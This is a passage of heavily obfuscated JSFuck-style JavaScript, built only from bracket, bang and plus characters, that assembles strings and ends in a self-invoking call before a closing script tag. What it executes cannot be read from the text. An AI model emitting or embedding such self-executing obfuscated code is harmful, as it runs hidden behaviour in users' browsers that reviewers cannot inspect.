]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>